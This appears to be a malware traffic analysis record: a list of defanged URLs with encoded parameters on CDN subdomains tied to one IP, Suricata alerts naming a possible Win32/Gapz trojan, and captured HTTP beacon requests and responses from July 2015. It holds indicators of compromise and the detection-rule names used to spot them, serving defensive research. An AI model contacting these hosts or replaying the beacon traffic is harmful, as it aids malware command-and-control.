hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=/k6kR j50tpQhScA1jb3T1HUtxFT8zgWnvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFYwi6MEIOzoe3sbJUX RIwaWTACqvES7cMRNUTv ezR4CQR6/4IivvmSmqX4 CyMVKUDaBP2Payz94nJwzEzT2yE8vsH YHvRtveyr8vVjKUos IILilpWF0OiEhuPxDpVgEOMXjo7/CYZ2nwp731j3GfAEMCG5iHMC5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkc8ksEftFDKUAygn/MlGFiLf /nZN3bfE=	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/22421.ashx?e=oE Olq3N8DJfg3lhfO/2vlmLSUZKnG3B/lCDRYG1zoqOcTxdoMXoDozpbjeDHyvNqJDnlUORNKJFgAYD7IlOORzySwR 0UMpQDKCf8yUYWLlsZJ2yfMTtUEt4u7lqt3stPVdUM8KI09jNgiw50h3MkLiTrp3cOxvYCpHZc9ZUaGLbhvor/ikhRQC drCF7eF3rUREaMaDcYM9FSSDYOxx0COCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndge7ouA16n0iIBvLHla3W6ub3IRsoVFcpzK XYKCjTu0=	198.232.124.192
hxxp://denq2hm5zt6-hvjtfa3f.netdna-ssl.com/4432.ashx?e=XOxRKBm2zlz43cdm0TeNYmMS6xMm5DPOlM4Je9tLtVemy6t0 u4xzc/4PvVcYKfqUA7dl9owwhIeI9VTThLJ3YHu6LgNep9IiAbyx5Wt1urm9yEbKFRXKSs2YoLIjQ/nWMnNHFDGURlNWDfw1ts4xU6wMsp3Wz5PMAzGRDL7b/3IROPie2z40 X0A62pnUj3KYX3Ti/i3YPXb210L2slDWLsCOEoMJlpBenlCu3G3PiNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVS0Dr1TyY f1LlTZj/ksx1M3QX7hNUcBx	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/22421.ashx?e=tXVAHsxnBG7K7BVW0pZkfszkfVrW9tStIM0CqmsRfbtxTYwWxYG9WM2wWArmgLQLe/xsl9xq9FBosbTknH6Z5q1yMTX l/6f1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqn4U8uoq4rC8jC8FaAJlN651M0VcwJ5frh/bLm/j9YcRV23zceadiRZC/AFbVLp3Hi0MyGFWhm97EgudgSzDBDiV gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFmOdeW8Cm Pw=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/22421.ashx?e=oE Olq3N8DJfg3lhfO/2vlmLSUZKnG3B/lCDRYG1zoqOcTxdoMXoDozpbjeDHyvNqJDnlUORNKJFgAYD7IlOORzySwR 0UMpQDKCf8yUYWLlsZJ2yfMTtUEt4u7lqt3stPVdUM8KI09jNgiw50h3MkLiTrp3cOxvYCpHZc9ZUaGLbhvor/ikhRQC drCF7eF3rUREaMaDcYM9FSSDYOxx0COCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndge7ouA16n0iIBvLHla3W6ub3IRsoVFcpzK XYKCjTu0=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/22421.ashx?e=tXVAHsxnBG7K7BVW0pZkfszkfVrW9tStIM0CqmsRfbtxTYwWxYG9WM2wWArmgLQLe/xsl9xq9FBosbTknH6Z5q1yMTX l/6f1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqnJyMz45O1xrVtQeXCcg/Fhy2/UUM264sa8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=xY8ohDYpM j7QFMK1iR6ljGi57tKDBZAyMlYLXuYTiQeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UCYMJqhRDyHcX4l9XCm/Va9X2V/SFN607WhPkLraqHTm0JQd5HxgIXcQOMljDWW9j2p99Xf0/DnudxygAlsjjAoDzAMf3myei3FoFumQGvNnWzsL6WMT/SwfVCvNBlCsGNZ8IeDOKR jnWMff4Q oj2Xr wogK3l0K88tZGn3ZbeZZ7z51F tJFmkm2U99zhC5SM3ph4m/ub2WPxooJBSEfKuXNkb9Ipz0vOSy6/9UD7v2dOTSCKQAEGFWYVf aIRoqDwneG9OT2WXrj6ZUfAb5hKtWJq6BTOwtTpX/QxZUjjb4jQoSuQY5U1UA3XDfdz2vKjb/PWSCkM43K3xVh7gIklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGWjsWCfHVghM1YRv8e2/klluTfYiSPrAFnyucPTMPOBI=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLM8BMMVZLFq8mxw368usKjpjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVS0Dr1TyY f1LlTZj/ksx1M3QX7hNUcBx	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=XOxRKBm2zlz43cdm0TeNYmMS6xMm5DPOlM4Je9tLtVemy6t0 u4xzc/4PvVcYKfqUA7dl9owwhIeI9VTThLJ3YHu6LgNep9IiAbyx5Wt1urm9yEbKFRXKSs2YoLIjQ/nWMnNHFDGURlNWDfw1ts4xU6wMsp3Wz5PMAzGRDL7b/3IROPie2z40 X0A62pnUj3KYX3Ti/i3YPXb210L2slDWLsCOEoMJlpBenlCu3G3PiNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVS0Dr1TyY f1LlTZj/ksx1M3QX7hNUcBx	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERJetwXok6MQkygRO0KnCdHCCNiNeNKIpAJfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgX kLq5c4q1u/WL/VEXbxSEIgVGveQowIH	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/22421.ashx?e=hXeqmv1IpenVj9BNm3y5BzGi57tKDBZAmkbcHfsclGUeaFNcfNJ0DqkO9/DuORuprIIa1xct7Ik 99Kb8MNzlldQOXofA8VY1QHs3X92ilFBkBMfD9KDE9CUHeR8YCF38kle5tupXGHHMGUmhiJT7gXXflM9GuSQ8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=xY8ohDYpM j7QFMK1iR6ljGi57tKDBZAyMlYLXuYTiQeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UCYMJqhRDyHcX4l9XCm/Va8FwTBnjqtB6SJSQWKLfKoAjgb6v7cXpPtruJ2zeNP9BRjldEvIPSqUX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF/pC6uXOKtbv1i/1RF28UhCIFRr3kKMCBw==	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/22421.ashx?e=gwZ4/u7hMkLK7BVW0pZkfhb2ezGP2tbZIM0CqmsRfbtxTYwWxYG9WM2wWArmgLQLe/xsl9xq9FBosbTknH6Z5kCN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q==	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=j7YMo/n29XPJd3Cl8WpRrisj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLciXFAHp4HlL1HtSmBYQHI0JQd5HxgIXeHOq2aoArvNY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VLQOvVPJj5/UuVNmP SzHUzdBfuE1RwHE=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=1ZEnpGuz/IS8qFEAMB5m c6n6T6feu1MnvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFYwi6MEIOzoe3sbJUX RIwaWTACqvES7cMRNUTv ezR4CQR6/4IivvmSmqX4 CyMVKUDaBP2Payz9333RAvM0VMAtaAQab8C2sQTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45HPJLBH7RQylAMoJ/zJRhYi3/v52Td23x	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=iDRrwQhh7wubZPRBHClMwBAZQSgySSeP/ToTRiVFxVRrBKqdyQvXy8FqjxctBQAySlCyq068/M1FOTAwlw8YF/pC6uXOKtbv1i/1RF28UhCIFRr3kKMCB3wF8xC533FcDPI5dGTWg78vFILB9JD7Z4ZVJDBzh9KR1QHs3X92ilGOTz1mAXFvBrPiCC4paVhd51vWMEpOYI9vFWuyZiLPwZdd8oa6X2ADHiBn688lkcr8toCm18jzw11KFwF9lIs91urDxSq54gssWphB8HvgGC5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkc8ksEftFDKUAygn/MlGFiLf /nZN3bfE=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=xY8ohDYpM j7QFMK1iR6ljGi57tKDBZAyMlYLXuYTiQeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UCYMJqhRDyHcX4l9XCm/Va AW1ilHO0XlqaFGmNQisoEs IILilpWF2V9PoQYImhoi5ITADj fT8LkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOORzySwR 0UMpQDKCf8yUYWIt/7 dk3dt8Q==	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=hpY1rXLYst7XN7SCySESdzGi57tKDBZABBvtTcvyOOgeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UCYMJqhRDyHcntO0hfxvipXjJX2BNWr5ZmwkqgaQEwGAs IILilpWF3Xrw5h2f8ieI2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VLQOvVPJj5/UuVNmP SzHUzdBfuE1RwHE=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=Lmrmx5d21cHK7BVW0pZkfpc0EuoUEWBpIM0CqmsRfbuUONmYGBhJBq3/AN/bF2roRdb/S8YKHkPcr4ZRnoqTVUtA69U8mPn9S5U2Y/5LMdTZIHVdl5GUgKkO9/DuORuprIIa1xct7IlIfNarWZRfuQ8SpJVUHpEeYCpHZc9ZUaETVDNBVYCm8jEzQGoF c24WnZlMkE cTWzrf1vX5AkfSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZaOxYJ8dWCEzVhG/x7b SWW5N9iJI sAWfK5w9Mw84Eg==	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLjBH6ZzUnnXsmxw368usKjGzyp8r50/oAU8yRr4Ty3tIPlhjIQTrv xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsqpqi7TBEiKvbDp/KqjdfkY7eULofKnZHg==	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERJOW4G7RSbXnJzBAJhcf/vDKYX3Ti/i3YOdKlZ7h7cKpMVf 88v DEXLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOORzySwR 0UMpQDKCf8yUYWIt/7 dk3dt8Q==	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/22421.ashx?e=hWfaA75NtHGgFyq1UqA1LTGi57tKDBZAmkbcHfsclGUeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UGixtOScfpnmrXIxNf6X/p8jq1U t1gQfOJGi8wh2qItjgb6v7cXpPvVs 1hpnKPWNckWery5nY61wQMeOGfVSoklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGWjsWCfHVghM1YRv8e2/klluTfYiSPrAFnyucPTMPOBI=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=lOCrbsNL2zULjT49fHfOTFMHaLbuV9qg/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8yvNHK2ogqjZ/efTFXb5IsdaoPZj94HyTCeQCV5QcxbtPZPHJIIJ7tLPiCC4paVhd65Cl b7PgcYaQxEgOaYYTbGJ7NLKRj9nU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=lOCrbsNL2zULjT49fHfOTFMHaLbuV9qg/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8yvNHK2ogqjZ/efTFXb5IsdaoPZj94HyTCeQCV5QcxbtPZPHJIIJ7tLPiCC4paVhd2Pbk/9NONlMwdHiAKz3nHY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDLLNMXZjRZW4=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=Lmrmx5d21cHK7BVW0pZkfpc0EuoUEWBpIM0CqmsRfbuUONmYGBhJBq3/AN/bF2roRdb/S8YKHkPcr4ZRnoqTVUtA69U8mPn9S5U2Y/5LMdTZIHVdl5GUgKkO9/DuORuprIIa1xct7IlIfNarWZRfuQ8SpJVUHpEeYCpHZc9ZUaF K90vWg22jgTxIUcsgQ w9JTsKksJzkc9GdOcgDY83FHRy24uRaNd5D1mYH yQN4uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45HPJLBH7RQylAMoJ/zJRhYi3/v52Td23x	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLRBRa93/wJ4K5g1UaeibIFKYX3Ti/i3YNSfnOwL00n5Z1 bwt5t6kul7 MWoTgv1cPg3JQuiDood/dJkCtxgij8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWMIujBCDs6Ht7GyVF/kSMGlkwAqrxEu3DF7I/BhPOwx7A==	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERKtK2nLIJE3nHvKbjUyzCCcFAL52sIXt4WJJdSgnf3DEaNti66QtAKhfA9DmA/gYOYuTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45HPJLBH7RQylAMoJ/zJRhYi3/v52Td23x	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLciXFAHp4HlNvmf3gdPUqQs IILilpWF3zNK4whhQy Y93IDHD2utNjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUtA69U8mPn9S5U2Y/5LMdTN0F 4TVHAcQ==	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=lOCrbsNL2zULjT49fHfOTFMHaLbuV9qg/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8yvNHK2ogqjZ/efTFXb5IsdaoPZj94HyTCeQCV5QcxbtPZPHJIIJ7tLPiCC4paVhdMjNPpg04wp5PJSvtznUqJGbmFw3eeWJ0LF5FjnIRYED/OBEyqhe3A4cQRUyfrCw1zIhutCMBGewHfwT3XPm7ZSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJpHZ15mOZ7RI=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=N6dOqWm8Q94fEbCpbJoCfl DeWF87/a tcdaVQJz0Lv UINFgbXOio5xPF2gxegOjOluN4MfK82okOeVQ5E0okWABgPsiU45HPJLBH7RQylAMoJ/zJRhYuWxknbJ8xO1QS3i7uWq3ey09V1QzwojTzzcpdlMXfDB0LGw gTQHOXEEASnTAt8o vdWl3XnoKt0JQd5HxgIXd4Ck/GAouPo3pu1a2/pSyUlKYWIS4b/TwQz5kcPJsPBXgEPYkm2R 4CM84BubBye2orW/U9pNYEne5haHOFLYKd5SlKONgbzwnZSRpvuXhKkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndge7ouA16n0iIBvLHla3W6ub3IRsoVFcpzK XYKCjTu0=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=/k6kR j50tpQhScA1jb3T1HUtxFT8zgWnvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFYwi6MEIOzoe3sbJUX RIwaWTACqvES7cMRNUTv ezR4CQR6/4IivvmSmqX4 CyMVKUDaBP2Payz94nJwzEzT2yE8vsH YHvRtveyr8vVjKUos IILilpWF0OiEhuPxDpVgEOMXjo7/CYZ2nwp731j3GfAEMCG5iHMC5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkc8ksEftFDKUAygn/MlGFiLf /nZN3bfE=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=vjRn qH YuNfg3lhfO/2vrXHWlUCc9C7/lCDRYG1zoqOcTxdoMXoDozpbjeDHyvNqJDnlUORNKJFgAYD7IlOORzySwR 0UMpQDKCf8yUYWLlsZJ2yfMTtUEt4u7lqt3stPVdUM8KI0883KXZTF3wwdCxsPoE0BzlnbJKYwPfuhDE5OzB3lHNZDDg9SakjfptxJ3Q48ku2 MNZxDwj5vyAYr4bF0jrN61xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsqpqi7TBEiKvbDp/KqjdfkY7eULofKnZHg==	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=Lmrmx5d21cHK7BVW0pZkfpc0EuoUEWBpIM0CqmsRfbuUONmYGBhJBq3/AN/bF2roRdb/S8YKHkPcr4ZRnoqTVUtA69U8mPn9S5U2Y/5LMdTZIHVdl5GUgKkO9/DuORuprIIa1xct7IlIfNarWZRfuQ8SpJVUHpEeYCpHZc9ZUaFteqZ6txLbCymF904v4t2Dnog6XUlbewcH2RZLt1dnp6UixEX0xfzw4HtieZnm 5lfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgX kLq5c4q1u/WL/VEXbxSEIgVGveQowIH	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=AZwPyJy3TZh4HRn2UIUeHjMhuAiDCZy0nvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFYwi6MEIOzoe3sbJUX RIwaWTACqvES7cMRNUTv ezR4CQR6/4IivvmSmqX4 CyMVKUDaBP2Payz94u3oGHN86wPfE/ OuNytPyvTet81FAwHjgb6v7cXpPsCR1eJJaqZuTEmVd5boNaQ9RM9cvdqwuUEQrG4Q2s2p4ghywxFINBPLhsL7x0yEItFgAYD7IlOORzySwR 0UMpQDKCf8yUYWIYaNv1rXN/ko2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VLQOvVPJj5/UuVNmP SzHUzdBfuE1RwHE=	198.232.124.192
hxxp://71e8lz54x-hvjtfa3f.netdna-ssl.com/4432.ashx?e=/9ZmISdorEsrtsyJz2huuzGi57tKDBZAEhGH33nPGlEeaFNcfNJ0DqkO9/DuORuprIIa1xct7IlIfNarWZRfueseCNypxTRvYCpHZc9ZUaH6MIOzDij/FhQC drCF7eFJbqKp/8aFwxJ6jPseS6H6rKvpxbP8RnAEuJwrUmAgU48TCxIgxbNUN9iFWinPncqRTkwMJcPGBf6QurlzirW79Yv9URdvFIQiBUa95CjAgcklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CaR2deZjme0S	198.232.124.192
d23ocewf5ttxmu.cloudfront.net	216.137.61.189

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Possible Win32/Gapz MSIE 9 on Windows NT 5
ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /t.ashx?e=tXVAHsxnBG7K7BVW0pZkfszkfVrW9tStIM0CqmsRfbtxTYwWxYG9WM2wWArmgLQLe/xsl9xq9FBosbTknH6Z5kCN9h bV19VSl3u293svNWe4QpoO1WcaCmF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: denq2hm5zt6-hvjtfa3f.netdna-ssl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:58 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=tXVAHsxnBG7K7BVW0pZkfszkfVrW9tStIM0CqmsRfbtxTYwWxYG9WM2wWArmgLQLe/xsl9xq9FBosbTknH6Z5kCN9h bV19VSl3u293svNWe4QpoO1WcaCmF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: denq2hm5zt6-hvjtfa3f.netdna-ssl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:58 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=tXVAHsxnBG7K7BVW0pZkfszkfVrW9tStIM0CqmsRfbtxTYwWxYG9WM2wWArmgLQLe/xsl9xq9FBosbTknH6Z5kCN9h bV19VSl3u293svNWe4QpoO1WcaCmF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: denq2hm5zt6-hvjtfa3f.netdna-ssl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:59 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
abfgshdgfjhskHTTP/1.1 200 OK..Date: Mon, 06 Jul 2015 20:25:59 GMT..Con
tent-Type: text/html; charset=utf-8..Content-Length: 13..Connection: k
eep-alive..Cache-Control: private,no-cache, no-store..X-AspNet-Version
: 2.0.50727..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X-Cache:
 MISS..abfgshdgfjhsk..

GET /22421.ashx?e=hWfaA75NtHGgFyq1UqA1LTGi57tKDBZAmkbcHfsclGUeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UGixtOScfpnmrXIxNf6X/p8jq1U t1gQfOJGi8wh2qItjgb6v7cXpPvVs 1hpnKPWNckWery5nY61wQMeOGfVSoklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGWjsWCfHVghM1YRv8e2/klluTfYiSPrAFnyucPTMPOBI= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:55 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


